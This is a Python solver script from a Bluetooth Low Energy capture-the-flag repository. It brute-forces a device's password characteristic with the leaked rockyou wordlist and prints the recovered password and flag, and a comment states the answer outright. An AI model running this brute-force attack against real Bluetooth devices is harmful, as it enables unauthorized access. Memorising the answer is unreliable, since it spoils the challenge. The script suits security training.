BLE_CTF_V2/lvl_02.py at 74e38ffec0562d11fd27a3658a47372069c83faa

Fork: 0

0xRoM / BLE_CTF_V2

Find file

Newer

Older

BLE_CTF_V2 / lvl_02.py

root on 11 Mar 2022 1 KB tidying for public release

Raw Blame History

#! /usr/bin/python
import binascii
import struct
import sys, os, time
import bluepy.btle as btle
  
'''
42  0x2A   READ WRITE   Enter password here. Use rockyou.
44  0x2C   READ 
46  0x2E   READ WRITE   write here to goto to scoreboard

password1234 - eca7d1f3cf60a8b5344a
'''

rockyou = "/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt"

deviceMAC = open('ctf_mac.txt').read()  
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID(0x00FF)
print ("Attached to peripheral")

print("Loading level 02")
hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
p.writeCharacteristic(0x30, hex1, withResponse=False)

with open(rockyou) as f: 
    for password in f: 
    
        sys.stdout.write("\rTrying: %s                                          " % password.rstrip())
        response = p.writeCharacteristic(0x2A, password.rstrip(), withResponse=True)
        
        hex1 = p.readCharacteristic(0x2C)
        hex2 = binascii.b2a_hex(hex1) 
        hexlif2 = str(binascii.unhexlify(hex2))
        
        if hexlif2 <> "":
           print "\rPassword Found: %s" % password.rstrip() 
           print "Flag: %s" % hexlif2
           break; 
            
p.disconnect()